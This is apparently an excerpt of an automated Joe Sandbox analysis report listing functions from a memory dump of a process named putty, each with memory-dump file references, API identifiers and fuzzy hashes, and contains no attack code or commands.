                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystemValue
                      • String ID:
                      • API String ID: 3029459697-0
                      • Opcode ID: abb5f3cec4ff362770d1342f42244cd9a48485c11d3d4892fe7aa86ca48b9eee
                      • Instruction ID: 092ac9f279b540d813e344426edbfab0975c097ba22c6a8b6186ba06800a1dfc
                      • Opcode Fuzzy Hash: abb5f3cec4ff362770d1342f42244cd9a48485c11d3d4892fe7aa86ca48b9eee
                      • Instruction Fuzzy Hash: 4E012D73F1855156EB106F35E8407BA7A91EB407A0F718231D279876CAEF3C9CC19705
                      Function 00007FF6786A2EDC Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                      Download Yara Rule
                      APIs
                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6786A22B7,?,?,?,?,?,?,?,?,00000000,00007FF6786A943C), ref: 00007FF6786A2F2B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: EnumLocalesSystem
                      • String ID:
                      • API String ID: 2099609381-0
                      • Opcode ID: 8a0dd470fdcead8dddeb2970784ad091dbe112c6c0a7a92d94a8fdedb158568e
                      • Instruction ID: 9a0b6748f9492b34000ac30d320c14526f7014990d8ea5bb9308a263e31bbbb1
                      • Opcode Fuzzy Hash: 8a0dd470fdcead8dddeb2970784ad091dbe112c6c0a7a92d94a8fdedb158568e
                      • Instruction Fuzzy Hash: 10F08C73B18A8593E704CB39F8401AA2762FBA8780F648035EA4DD3368DF3CD951D708
                      Function 00007FF678610DE0 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AsyncSelectrecv
                      • String ID:
                      • API String ID: 3881473523-0
                      • Opcode ID: f3ce5cf4d50df0b3d745acc74cdbada7605895cccbc6249d645d1e403d16cc15
                      • Instruction ID: 07ab7197cd11b972938cf7ab819fc6bb994d207c51bbfc4106663101cdede7ec
                      • Opcode Fuzzy Hash: f3ce5cf4d50df0b3d745acc74cdbada7605895cccbc6249d645d1e403d16cc15
                      • Instruction Fuzzy Hash: B3F0C216B2C18250FB30E33AF09536E6F909B59798F241038CB8C4B352CD5ED986970A
                      Function 00007FF6785FAA80 Relevance: 1.5, APIs: 1, Instructions: 26comCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID:
                      • API String ID: 542301482-0
                      • Opcode ID: 03de8d71a4be3953e10ae13e30a1e1ff27b4efe455a589614f809a35615d1a43
                      • Instruction ID: e432d80b52486c0dc55d7ad52aaccb52f828619245af5e921affbef511d192f5
                      • Opcode Fuzzy Hash: 03de8d71a4be3953e10ae13e30a1e1ff27b4efe455a589614f809a35615d1a43
                      • Instruction Fuzzy Hash: A7F06D22B28E4591EB10DB36E48416E7BA0FBC8B88FA14132ED4D83724DF3CD505CB04
                      Function 00007FF6785ECDA0 Relevance: .7, Instructions: 737COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 993e43af5144b5df1f7e92e88d904c3feb4072d45124f6a2942c69ba0701a111
                      • Instruction ID: b07f7c41985dc7f728120063f0a1c6c6cc54e0b0c7912557c9cdee34ba649511
                      • Opcode Fuzzy Hash: 993e43af5144b5df1f7e92e88d904c3feb4072d45124f6a2942c69ba0701a111
                      • Instruction Fuzzy Hash: DF627263A2855286FBA48B3DC98837D6B91EB50764F788232D65DCB2D4DE3CEC95C304
                      Function 00007FF678614B00 Relevance: .5, Instructions: 483COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 46426d5d7efc5a345a0938ac86cbc428851b82a614d0deccf848203279138596
                      • Instruction ID: 6ecdef1e901066320a15bc7870dfdae56bad5b0bd50a434f76b0bd7a14d8b8cb
                      • Opcode Fuzzy Hash: 46426d5d7efc5a345a0938ac86cbc428851b82a614d0deccf848203279138596
                      • Instruction Fuzzy Hash: 62325D33615B4097DB64CF2AE58032ABBB5F748B94F244129DB9D83B94DF39E8A0D704
                      Function 00007FF6785E0B00 Relevance: .4, Instructions: 393COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef495411578315094c3b8b0b0ef82c0cbbefe29a80ec4ea727437fef7d1e84bc
                      • Instruction ID: cfdba3acfdc19d1eead021529f3c42bf97d3d8c10db60c66d5262f695c7c1659
                      • Opcode Fuzzy Hash: ef495411578315094c3b8b0b0ef82c0cbbefe29a80ec4ea727437fef7d1e84bc
                      • Instruction Fuzzy Hash: 2D02D42BD3ABD695F323473E64032A6EA14AFB72C5F10D327FEC471963AF1992415218
                      Function 00007FF67868F9DC Relevance: .3, Instructions: 339COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6491c457c2f999092d19aac2a781b34ba13e1e847d4f134996f3fd6c7cfe067f
                      • Instruction ID: 51a02f70a96f2eeeb926a72b319c3adaaac939e272256533b1db996086d035d9
                      • Opcode Fuzzy Hash: 6491c457c2f999092d19aac2a781b34ba13e1e847d4f134996f3fd6c7cfe067f
                      • Instruction Fuzzy Hash: 59D1E423A2860296EB688F35C05057F3BA1FB66B44F744136DE4D87395DF29EC42E748
                      Function 00007FF67868EB94 Relevance: .3, Instructions: 317COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce389f0dbad14dee4605976a16223a6dc27675f2768b1d64b873d7454b2587f6
                      • Instruction ID: adcf21fa819004e54ee99f214c8e1f1604fd718ca4f9c24a315a5a77bdda5ed8
                      • Opcode Fuzzy Hash: ce389f0dbad14dee4605976a16223a6dc27675f2768b1d64b873d7454b2587f6
                      • Instruction Fuzzy Hash: 7BD1E66BD28646A6EB248B39900437F2BA1EB46B48F340135DE5C972D5CF3DEC46E748
                      Function 00007FF678693384 Relevance: .3, Instructions: 283COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3586640a44890738779c2210aa53c8a3810d9f753ae1b3ee725ba0205a4a53de
                      • Instruction ID: 9f2bc263de4d1730c713803a3453b7afd04b7cbff675da1a074c8782b13baa2b
                      • Opcode Fuzzy Hash: 3586640a44890738779c2210aa53c8a3810d9f753ae1b3ee725ba0205a4a53de
                      • Instruction Fuzzy Hash: 4A913633B3824256EA264F3996117BB5E80AF54798F25213DDE2EC77C0DE2CED05B608
                      Function 00007FF678622A80 Relevance: .3, Instructions: 253COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID:
                      • API String ID: 3015471070-0
                      • Opcode ID: dce5b378301aeb93486de878a6dbbf0f258c3ad3a5b23ff118a7b10539390b69
                      • Instruction ID: 8cf18afdc8a2b75c148b023d54242d296e9ecba174ab4bc00794e8ef4912b6f6
                      • Opcode Fuzzy Hash: dce5b378301aeb93486de878a6dbbf0f258c3ad3a5b23ff118a7b10539390b69
                      • Instruction Fuzzy Hash: CC91A392B3455151FE60E6329865B7B5942AF91FC4F606432CC0ECBFEACD2DE842A748
                      Function 00007FF67864DE20 Relevance: .2, Instructions: 228COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b088e3172ef4aa47bafa1664d58f0dba8de934b6747f9e3229532073849205f8
                      • Instruction ID: 84853d9f8b0e263061a5b6a774a0b29345a4aab2569cdeff8929d0b9b0ec9311
                      • Opcode Fuzzy Hash: b088e3172ef4aa47bafa1664d58f0dba8de934b6747f9e3229532073849205f8
                      • Instruction Fuzzy Hash: 35915863E29EA055E7528E3894106AE6B50EBD2BF4F548321EF7A637C5DF38DA05D300
                      Function 00007FF6786A51A8 Relevance: .2, Instructions: 198COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1464a300b82f4d445202c349458bfcef681b42edd2164d84a97aa5e268fa6d8
                      • Instruction ID: 4618b5d611238437110197e008f4c93c38a84d9b7705b8fa74676b1ad6771e06
                      • Opcode Fuzzy Hash: c1464a300b82f4d445202c349458bfcef681b42edd2164d84a97aa5e268fa6d8
                      • Instruction Fuzzy Hash: DA813273A2839156E774CBA9A44937B6E90FB857D4F204235DA8DC3B89DF3CE8009B05
                      Function 00007FF67864BB20 Relevance: .1, Instructions: 147COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64a46574fdf679952a0eee8ad8c70b303fb918f27ea6c93530dc7566e7daff06
                      • Instruction ID: 055d0745b78eb53bf3ec4be5ffecf31ce0388778b43f7a04904af0a1813b66da
                      • Opcode Fuzzy Hash: 64a46574fdf679952a0eee8ad8c70b303fb918f27ea6c93530dc7566e7daff06
                      • Instruction Fuzzy Hash: C851D3236286C58AD630CB69E4403AFBB60F7AA780F548125EF9D47B46DE3CD945DB04
                      Function 00007FF678690A48 Relevance: .1, Instructions: 137COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a97a125e0549cbe2ad6d01ac3071c6227dfd6c840263be93129855c060f7b1e0
                      • Instruction ID: ba28a93a674e32fe7622c296564706b1f0ce7e079a20e89b8f2ee80f68fe02e3
                      • Opcode Fuzzy Hash: a97a125e0549cbe2ad6d01ac3071c6227dfd6c840263be93129855c060f7b1e0
                      • Instruction Fuzzy Hash: 4B51C573A2861292E7685F38C15433E2BA1EB51B68F250139CF4D973D9CF29EC81E785
                      Function 00007FF678690C30 Relevance: .1, Instructions: 137COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69f41e91bb1900607b4e590bb544d0f914509903c5deb0e27407eaa9e2ed3077
                      • Instruction ID: 62689a7c0d152188f18cb50149eb3c525d43ae6234316a4020f617381e382912
                      • Opcode Fuzzy Hash: 69f41e91bb1900607b4e590bb544d0f914509903c5deb0e27407eaa9e2ed3077
                      • Instruction Fuzzy Hash: 3851AF73A2861192E3689F38815433E2BA0EB44B58F350139DE0A977D9CF38EC81D789
                      Function 00007FF678690E18 Relevance: .1, Instructions: 137COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 643aa03c674907792788453401d857057167d95c71c3fec9667ad152b2215e57
                      • Instruction ID: e3414752954114ffa26a308262251e720d4bc455cdc518760fc6cf6206a69263
                      • Opcode Fuzzy Hash: 643aa03c674907792788453401d857057167d95c71c3fec9667ad152b2215e57
                      • Instruction Fuzzy Hash: 5451CD37A2861192E7689F38D15433E2BA1EB41B58F240139DF4D977D8CF28EC81E789
                      Function 00007FF67864D2D0 Relevance: .1, Instructions: 100COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
